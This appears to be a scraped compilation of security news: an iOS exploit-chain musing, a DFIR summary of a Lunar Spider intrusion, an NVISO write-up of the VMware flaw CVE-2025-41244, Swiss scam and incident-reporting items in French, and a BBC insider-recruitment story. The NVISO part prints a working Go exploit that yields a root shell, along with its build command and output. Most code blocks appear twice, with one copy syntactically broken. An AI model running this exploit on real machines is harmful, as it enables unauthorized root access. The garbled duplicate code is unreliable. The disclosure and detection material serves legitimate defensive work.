If you look at this bug's advisory you can find that Apple clearly says that this bug was a part of some iOS chain: "Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2.". Now the weird part is you don't see the exploited against versions of iOS before iOS XX.X line very often in security updates, if we look around CVEs from those days we see a WebKit -> UIProcess (I guess?) bug CVE-2025-24201 with very similar impact description "This is a supplementary fix for an attack that was blocked in iOS 17.2. (Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2.)" And if we go back to iOS 17.2/17.3 we see couple of CVEs which look like some chain all labeled as actively exploited and not designated to any 3rd party like Google TAG or any human rights security lab. Now I believe this mediaplaybackd sandbox escape was a 2nd stage sandbox escape in an iOS ITW chain. Here's what my speculated iOS 17 chain looks like (could be totally wrong but we'll probably never know):

WebKit (CVE-2024-23222)

UIProc sbx (CVE-2025-24201)

mediaplaybackd sbx (CVE-2025-24085)

Kernel ???

PAC?/PPL (CVE-2024-23225 / CVE-2024-23296)
Question is: how many pivots are too many pivots? :P

From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion

The DFIR Report - thedfirreport.com/2025/09/29 September 29, 2025

Key Takeaways
The intrusion began with a Lunar Spider linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via a MSI installer.
Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor.
Credentials were harvested from several sources like LSASS, backup software, and browsers, and also a Windows Answer file used for automated provisioning.
Twenty days into the intrusion data was exfiltrated using Rclone and FTP.
Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration.
This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025

Case Summary
The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32.

The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands.

Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host.

On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment.

On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.

They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and setup an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool that used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they were unable to establish a command and control channel from this action.

On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.

Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions.

On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later on the backup server they appeared again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity ceased again.

The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion.

You name it, VMware elevates it (CVE-2025-41244)

blog.nviso.eu Maxime Thiebaut Incident Response & Threat Researcher Expert within NVISO CSIRT 29.09.2025

NVISO has identified zero-day exploitation of CVE-2025-41244, a local privilege escalation vulnerability impacting VMware's guest service discovery features.

On September 29th, 2025, Broadcom disclosed a local privilege escalation vulnerability, CVE-2025-41244, impacting VMware’s guest service discovery features. NVISO has identified zero-day exploitation in the wild beginning mid-October 2024.

The vulnerability impacts both the VMware Tools and VMware Aria Operations. When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root).

Throughout its incident response engagements, NVISO determined with confidence that UNC5174 triggered the local privilege escalation. We can however not assess whether this exploit was part of UNC5174’s capabilities or whether the zero-day’s usage was merely accidental due to its trivialness. UNC5174, a Chinese state-sponsored threat actor, has repeatedly been linked to initial access operations achieved through public exploitation.

Background
Organizations relying on the VMware hypervisor commonly employ the VMware Aria Suite to manage their hybrid‑cloud workloads from a single console. Within this VMware Aria Suite, VMware Aria Operations is the component that provides performance insights, automated remediation, and capacity planning for the different hybrid‑cloud workloads. As part of its performance insights, VMware Aria Operations is capable of discovering which services and applications are running in the different virtual machines (VMs), a feature offered through the Service Discovery Management Pack (SDMP).

The discovery of these services and applications can be achieved in either of two modes:

The legacy credential-based service discovery relies on VMware Aria Operations running metrics collector scripts within the guest VM using a privileged user. In this mode, all the collection logic is managed by VMware Aria Operations and the guest’s VMware Tools merely acts as a proxy for the performed operations.
The credential-less service discovery is a more recent approach where the metrics collection has been implemented within the guest’s VMware Tools itself. In this mode, no credentials are needed as the collection is performed under the already privileged VMware Tools context.
As part of its discovery, NVISO was able to confirm the privilege escalation affects both modes, with the logic flaw hence being respectively located within VMware Aria Operations (in credential-based mode) and the VMware Tools (in credential-less mode). While VMware Aria Operations is proprietary, the VMware Tools are available as an open-source variant known as VMware’s open-vm-tools, distributed on most major Linux distributions. The following CVE-2025-41244 analysis is performed on this open-source component.

Analysis
Within open-vm-tools’ service discovery feature, the component handling the identification of a service’s version is achieved through the get-versions.sh shell script. As part of its logic, the get-versions.sh shell script has a generic get_version function. The function takes as argument a regular expression pattern, used to match supported service binaries (e.g., /usr/bin/apache), and a version command (e.g., -v), used to indicate how a matching binary should be invoked to retrieve its version.

When invoked, get_version loops $space_separated_pids, a list of all processes with a listening socket. For each process, it checks whether service binary (e.g., /usr/bin/apache) matches the regular expression and, if so, invokes the supported service’s version command (e.g., /usr/bin/apache -v).

get_version() {
PATTERN=$1
VERSION_OPTION=$2
for p in $space_separated_pids
do
COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]}" $VERSION_OPTION 2>&1)" VERSIONEND
done
}
get_version() {
PATTERN=$1
VERSION_OPTION=$2
for p in $space_separated_pids
do
COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]
}" $VERSION_OPTION 2>&1)" VERSIONEND
done
}
The get_version function is called using several supported patterns and associated version commands. While this functionality works as expected for system binaries (e.g., /usr/bin/httpd), the usage of the broad‑matching \S character class (matching non‑whitespace characters) in several of the regex patterns also matches non-system binaries (e.g., /tmp/httpd). These non-system binaries are located within directories (e.g., /tmp) which are writable to unprivileged users by design.

get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\S
nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\S
nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
By matching and subsequently executing non-system binaries (CWE-426: Untrusted Search Path), the service discovery feature can be abused by unprivileged users through the staging of malicious binaries (e.g., /tmp/httpd) which are subsequently elevated for version discovery. As simple as it sounds, you name it, VMware elevates it.

Proof of Concept
To abuse this vulnerability, an unprivileged local attacker can stage a malicious binary within any of the broadly-matched regular expression paths. A simple common location, abused in the wild by UNC5174, is /tmp/httpd. To ensure the malicious binary is picked up by the VMware service discovery, the binary must be run by the unprivileged user (i.e., show up in the process tree) and open at least a (random) listening socket.

The following bare-bone CVE-2025-41244.go proof-of-concept can be used to demonstrate the privilege escalation.

package main

import (
"fmt"
"io"
"net"
"os"
"os/exec"
)

func main() {
// If started with an argument (e.g., -v or --version), assume we're the privileged process.
// Otherwise, assume we're the unprivileged process.
if len(os.Args) >= 2 {
if err := connect(); err != nil {
panic(err)
}
} else {
if err := serve(); err != nil {
panic(err)
}
}
}

func serve() error {
// Open a dummy listener, ensuring the service can be discovered.
dummy, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
return err
}
defer dummy.Close()

// Open a listener to exchange stdin, stdout and stderr streams.
l, err := net.Listen("unix", "@cve")
if err != nil {
return err
}
defer l.Close()

// Loop privilege escalations, but don't do concurrency.
for {
if err := handle(l); err != nil {
return err
}
}
}

func handle(l net.Listener) error {
// Wait for the privileged stdin, stdout and stderr streams.
fmt.Println("Waiting on privileged process...")

stdin, err := l.Accept()
if err != nil {
return err
}
defer stdin.Close()

stdout, err := l.Accept()
if err != nil {
return err
}
defer stdout.Close()

stderr, err := l.Accept()
if err != nil {
return err
}
defer stderr.Close()

// Interconnect stdin, stdout and stderr.
fmt.Println("Connected to privileged process!")
errs := make(chan error, 3)

go func() {
, err := io.Copy(os.Stdout, stdout)
errs <- err
}()
go func() {
, err := io.Copy(os.Stderr, stderr)
errs <- err
}()
go func() {
_, err := io.Copy(stdin, os.Stdin)
errs <- err
}()

// Abort as soon as any of the interconnected streams fails.
_ = <-errs
return nil
}

func connect() error {
// Define the privileged shell to execute.
cmd := exec.Command("/bin/sh", "-i")

// Connect to the unprivileged process
stdin, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stdin.Close()

stdout, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stdout.Close()

stderr, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stderr.Close()

// Interconnect stdin, stdout and stderr.
fmt.Fprintln(stdout, "Starting privileged shell...")
cmd.Stdin = stdin
cmd.Stdout = stdout
cmd.Stderr = stderr

return cmd.Run()
}
package main

import (
"fmt"
"io"
"net"
"os"
"os/exec"
)

func main() {
// If started with an argument (e.g., -v or --version), assume we're the privileged process.
// Otherwise, assume we're the unprivileged process.
if len(os.Args) >= 2 {
if err := connect(); err != nil {
panic(err)
}
} else {
if err := serve(); err != nil {
panic(err)
}
}
}

func serve() error {
// Open a dummy listener, ensuring the service can be discovered.
dummy, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
return err
}
defer dummy.Close()

    // Open a listener to exchange stdin, stdout and stderr streams.
    l, err := net.Listen("unix", "@cve")
    if err != nil {
            return err
    }
    defer l.Close()

    // Loop privilege escalations, but don't do concurrency.
    for {
            if err := handle(l); err != nil {
                    return err
            }
    }

}

func handle(l net.Listener) error {
// Wait for the privileged stdin, stdout and stderr streams.
fmt.Println("Waiting on privileged process...")

    stdin, err := l.Accept()
    if err != nil {
            return err
    }
    defer stdin.Close()

    stdout, err := l.Accept()
    if err != nil {
            return err
    }
    defer stdout.Close()

    stderr, err := l.Accept()
    if err != nil {
            return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Println("Connected to privileged process!")
    errs := make(chan error, 3)

    go func() {
            _, err := io.Copy(os.Stdout, stdout)
            errs <- err
    }()
    go func() {
            _, err := io.Copy(os.Stderr, stderr)
            errs <- err
    }()
    go func() {
            _, err := io.Copy(stdin, os.Stdin)
            errs <- err
    }()

    // Abort as soon as any of the interconnected streams fails.
    _ = <-errs
    return nil

}

func connect() error {
// Define the privileged shell to execute.
cmd := exec.Command("/bin/sh", "-i")

    // Connect to the unprivileged process
    stdin, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stdin.Close()

    stdout, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stdout.Close()

    stderr, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Fprintln(stdout, "Starting privileged shell...")
    cmd.Stdin = stdin
    cmd.Stdout = stdout
    cmd.Stderr = stderr

    return cmd.Run()

}
Once compiled to a matching path (e.g., go build -o /tmp/httpd CVE-2025-41244.go) and executed, the above proof of concept will spawn an elevated root shell as soon as the VMware metrics collection is executed. This process, at least in credential-less mode, has historically been documented to run every 5 minutes.

nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off

id

uid=0(root) gid=0(root) groups=0(root)
#
nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off

id

uid=0(root) gid=0(root) groups=0(root)
#
Credential-based Service Discovery
When service discovery operates in the legacy credential-based mode, VMware Aria Operations will eventually trigger the privilege escalation once it runs the metrics collector scripts. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged context of the configured credentials. The beneath process tree was obtained by running the ps -ef --forest command through the privilege escalation shell, where the entries until line 4 are legitimate and the entries as of line 5 part of the proof-of-concept exploit.

UID PID PPID C STIME TTY TIME CMD
root 806 1 0 08:54 ? 00:00:21 /usr/bin/vmtoolsd
root 80617 806 0 13:20 ? 00:00:00 _ /usr/bin/vmtoolsd
root 80618 80617 0 13:20 ? 00:00:00 _ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script_-28702555433556123420.sh
root 80621 80618 0 13:20 ? 00:00:00 _ /tmp/httpd -v
root 80626 80621 0 13:20 ? 00:00:00 _ /bin/sh -i
root 81087 80626 50 13:22 ? 00:00:00 _ ps -ef --forest
UID PID PPID C STIME TTY TIME CMD
root 806 1 0 08:54 ? 00:00:21 /usr/bin/vmtoolsd
root 80617 806 0 13:20 ? 00:00:00 _ /usr/bin/vmtoolsd
root 80618 80617 0 13:20 ? 00:00:00 _ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script
-28702555433556123420.sh
root 80621 80618 0 13:20 ? 00:00:00 _ /tmp/httpd -v
root 80626 80621 0 13:20 ? 00:00:00 _ /bin/sh -i
root 81087 80626 50 13:22 ? 00:00:00 \
ps -ef --forest
Credential-less Service Discovery
When service discovery operates in the modern credential-less mode, the VMware Tools will eventually trigger the privilege escalation once it runs the collector plugin. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged VMware Tools user context. The beneath process tree was obtained by running the ps -ef --forest command through the privilege escalation shell, where the first entry is legitimate and all subsequent entries (line 3 and beyond) part of the proof-of-concept exploit.

UID PID PPID C STIME TTY TIME CMD
root 10660 1 0 13:42 ? 00:00:00 /bin/sh /usr/lib/x8664-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root 10688 10660 0 13:42 ? 00:00:00 _ /tmp/httpd -v
root 10693 10688 0 13:42 ? 00:00:00 _ /bin/sh -i
root 11038 10693 0 13:44 ? 00:00:00 \
ps -ef --forest
UID PID PPID C STIME TTY TIME CMD
root 10660 1 0 13:42 ? 00:00:00 /bin/sh /usr/lib/x8664-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root 10688 10660 0 13:42 ? 00:00:00 _ /tmp/httpd -v
root 10693 10688 0 13:42 ? 00:00:00 _ /bin/sh -i
root 11038 10693 0 13:44 ? 00:00:00 \
ps -ef --forest
Detection
Successful exploitation of CVE-2025-41244 can easily be detected through the monitoring of uncommon child processes as demonstrated in the above process trees. Being a local privilege escalation, abuse of CVE-2025-41244 is indicative that an adversary has already gained access to the affected device and that several other detection mechanisms should have triggered.

Under certain circumstances, exploitation may forensically be confirmed in legacy credential-based mode through the analysis of lingering metrics collector scripts and outputs under the /tmp/VMware-SDMP-Scripts-{UUID}/ folders. While less than ideal, this approach may serve as a last resort in environments without process monitoring on compromised machines. The following redacted metrics collector script was recovered from the /tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.sh location and mentions the matched non-system service binary on its last line.

!/bin/sh

if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stdout"
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stderr"
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}_0.stderr"

!/bin/sh

if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stdout"
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stderr"
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script
-{ID}0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}_0.stderr"
Conclusions
While NVISO identified these vulnerabilities through its UNC5174 incident response engagements, the vulnerabilities’ trivialness and adversary practice of mimicking system binaries (T1036.005) do not allow us to determine with confidence whether UNC5174 willfully achieved exploitation.

The broad practice of mimicking system binaries (e.g., httpd) highlight the real possibility that several other malware strains have accidentally been benefiting from unintended privilege escalations for years. Furthermore, the ease with which these vulnerabilities could be identified in the open-vm-tools source code make it unlikely that knowledge of the privilege escalations did not predate NVISO’s in-the-wild identification.

Timeline
2025-05-19: Forensic artifact anomaly noted during UNC5174 incident response engagement.
2025-05-21: Forensic artifact anomaly attributed to unknown zero-day vulnerability.
2025-05-25: Zero day vulnerability identified and reproduced in a lab environment.
2025-05-27: Responsible disclosure authorized and initiated through Broadcom.
2025-05-28: Responsible disclosure triaged, investigation started by Broadcom.
2025-06-18: Embargo extended by Broadcom until no later than October to align release cycles.
2025-09-29: Embargo lifted, CVE-2025-41244 patches and advisory published.

Genève: Trois individus arrêtés pour des arnaques aux fausses amendes - lematin.ch

Trois hommes ont été interpellés pour avoir utilisé des SMS frauduleux afin d'escroquer des victimes.

Le Ministère public genevois annonce ce jeudi l’arrestation de trois personnes accusées d’arnaques aux fausses amende. Deux de ces individus ont 21 ans, le troisième 30 ans. L’un a été interpellé le 23 juillet, les deux autres plus récemment, les 5 et 7 septembre.

Deux ont été arrêtés dans des véhicules qui contenaient des «SMS-Blaster», le troisième individu est le propriétaire de l'un des véhicules.

Les «SMS-Blaster»? Ces appareils se substituent aux antennes des opérateurs téléphoniques pour récupérer des numéros de téléphone et envoyer des SMS contenant un lien vers des sites frauduleux.

Exemple donné par le Ministère public: «parkings-ge.com», qui imite le site officiel de la fondation genevoise des parkings.

Faux conseiller bancaire
«Les destinataires des SMS étaient invités à s'acquitter d'une fausse contravention et à fournir à cet effet leurs données personnelles et bancaires», est-il expliqué. «Dans un second temps, les victimes étaient contactées par un faux conseiller bancaire, lequel les incitait à lui transmettre les codes nécessaires pour procéder à des prélèvements sur leur compte bancaire».

Les trois individus arrêtés sont poursuivis pour escroquerie et utilisation abusive d'une installation de télécommunication.

Pour davantage d'information, la police genevoise avait récemment détaillé les arnaques à la fausse contravention ou fausse amende, avec les recommandations d'usage. Les principales étant de ne pas divulguer de données personnelles et de s’assurer de la légitimité de son interlocuteur pour toute sollicitation financière ou urgente.

Arnaque aux fausses amendes: trois personnes interpellées

justice.ge.ch 25/09/25 Communiqué de presse - Ministère public Genève

Entre le 23 juillet et le 7 septembre 2025, deux individus âgés de 21 ans et un autre âgé de 30 ans ont été arrêtés. Ils sont suspectés d'avoir participé à l'envoi de SMS incitant les destinataires à régler une fausse contravention.

A Genève, trois personnes ont été interpellées les 23 juillet, 5 et 7 septembre 2025, dont deux dans des véhicules qui contenaient des appareils appelés "SMS-Blaster", la troisième personne étant le propriétaire de l'un des véhicules.

Ils sont suspectés d'avoir utilisé ces appareils, lesquels se substituent aux antennes des opérateurs téléphoniques, afin de récupérer des numéros de téléphone pour envoyer des SMS contenant un lien vers des sites frauduleux tels que "parkings-ge.com", imitant le site officiel de la fondation des parking "amendes.ch". Les destinataires des SMS étaient invités à s'acquitter d'une fausse contravention et à fournir à cet effet leurs données personnelles et bancaires.

Dans un second temps, les victimes étaient contactées par un faux conseiller bancaire, lequel les incitait à lui transmettre les codes nécessaires pour procéder à des prélèvements sur leur compte bancaire

Pour ces faits, les prévenus sont poursuivis pour escroquerie (art. 146 CP) et utilisation abusive d'une installation de télécommunication (art. 179septies CP).

Les investigations sont menées par la brigade des cyber enquêtes sous la direction de la procureure Vanessa SCHWAB.

Les prévenus bénéficient de la présomption d'innocence.

Six mois d’obligation de signaler des cyberattaques contre des infrastructures critiques

news.admin.ch Berne, 29.09.2025

— L’obligation légale de signaler les cyberattaques contre les infrastructures critiques est entrée en vigueur le 1er avril 2025. L’Office fédéral de la cybersécurité (OFCS) tire un bilan positif après les six premiers mois. Jusqu’à présent, au total 164 cyberattaques contre des infrastructures critiques ont été signalées. Les sanctions prévues en cas de non-signalement entrent en vigueur le 1er octobre 2025.

L’obligation de signaler des cyberattaques contre des infrastructures critiques est entrée en vigueur il y a six mois. L’OFCS se montre globalement satisfait de la mise en application de cette mesure. Les organisations exploitantes d’infrastructures critiques s’en tiennent au délai légal qui prévoit de signaler des cyberattaques dans les 24 heures. L’utilisation du Cyber Security Hub, qui permet de simplifier considérablement le traitement des cyberattaques par l’OFCS, est particulièrement positive. Déjà avant l’introduction de l’obligation de signaler, la relation de confiance entre l’OFCS et de nombreuses organisations exploitantes d’infrastructures critiques était étroite. La longue collaboration entre les partenaires a constitué la base du lancement réussi de l’obligation de signaler.

164 signalements concernant des infrastructures critiques
Depuis début avril, au total 164 signalements de cyberattaques contre des infrastructures critiques ont été adressés à l’OFCS. Les plus fréquents concernent les attaques DDoS (18.1%), suivies par les piratages (16.1%), les attaques par rançongiciel (12.4%), les vols d’identifiants (11.4%), les fuites de données (9.8%), et les maliciels (9.3%). Des phénomènes combinés tels qu’attaques par rançongiciel avec fuites simultanées de données ont été décrits dans plusieurs cas. Les branches touchées sont multiples. Jusqu’à présent, la branche la plus fortement impactée était la finance (19%), suivie de l’informatique (8.7%) et du secteur de l’énergie (7.6%). D’autres signalements provenaient des autorités, du secteur de la santé, d’entreprises de télécommunication, du secteur postal, du secteur des transports, de la branche des médias et de celle des technologies ainsi que de l’alimentation.

Renforcement de l’échange d’informations
Les signalements sont enregistrés et analysés à des fins statistiques. Les informations obtenues n’aident pas seulement à réagir concrètement à un incident, mais elles contribuent également à une meilleure évaluation des menaces au niveau national et à alerter assez tôt d’autres organisations potentiellement affectées. Depuis l’entrée en vigueur de l’obligation de signaler, beaucoup plus d’organisations participent directement à l’échange d’informations. C’est pourquoi les signalements et les recommandations atteignent nettement plus d’acteurs par ce biais.

Des sanctions à partir du 1er octobre 2025 en cas d’infractions
Les sanctions prévues par la loi sur la sécurité de l’information en cas de non-signalement d’une cyberattaque entrent en vigueur le 1er octobre 2025. Les organisations exploitantes d’infrastructures critiques peuvent être sanctionnées d’une amende allant jusqu’à 100’000 francs si elles ne se conforment pas à cette obligation. Par ailleurs, si l’OFCS dispose d’indices laissant supposer qu’un signalement n’a pas été effectué, il est tenu de prendre contact en premier lieu avec l’autorité concernée. Ce n’est que lorsque les personnes concernées ne réagissent pas à cette prise de contact et à la décision qui s’ensuit, que l’OFCS peut déposer une plainte pénale.

'You'll never need to work again': Criminals offer reporter money to hack BBC

Reporter Joe Tidy was offered money if he would help cyber criminals access BBC systems.

Like many things in the shadowy world of cyber-crime, an insider threat is something very few people have experience of.

Even fewer people want to talk about it.

But I was given a unique and worrying experience of how hackers can leverage insiders when I myself was recently propositioned by a criminal gang.

"If you are interested, we can offer you 15% of any ransom payment if you give us access to your PC."

That was the message I received out of the blue from someone called Syndicate who pinged me in July on the encrypted chat app Signal.

I had no idea who this person was but instantly knew what it was about.

I was being offered a portion of a potentially large amount of money if I helped cyber criminals access BBC systems through my laptop.

They would steal data or install malicious software and hold my employer to ransom and I would secretly get a cut.

I had heard stories about this kind of thing.

In fact, only a few days before the unsolicited message, news emerged from Brazil that an IT worker there had been arrested for selling his login details to hackers which police say led to the loss of $100m (£74m) for the banking victim.

I decided to play along with Syndicate after taking advice from a senior BBC editor. I was eager to see how criminals make these shady deals with potentially treacherous employees at a time when cyber-attacks around the world are becoming more impactful and disruptive to everyday life.

I told Syn, who had changed their name mid-conversation, that I was potentially interested but needed to know how it works.

They explained that if I gave them my login details and security code then they would hack the BBC and then extort the corporation for a ransom in bitcoin. I would be in line for a portion of that payout.

They upped their offer.

"We aren't sure how much the BBC pays you but what if you took 25% of the final negotiation as we extract 1% of the BBC's total revenue? You wouldn't need to work ever again."

Syn estimated that their team could demand a ransom in the tens of millions if they successfully infiltrated the corporation.

The BBC has not publicly taken a position on whether or not it would pay hackers but advice from the National Crime Agency is not to pay.

Still, the hackers continued their pitch.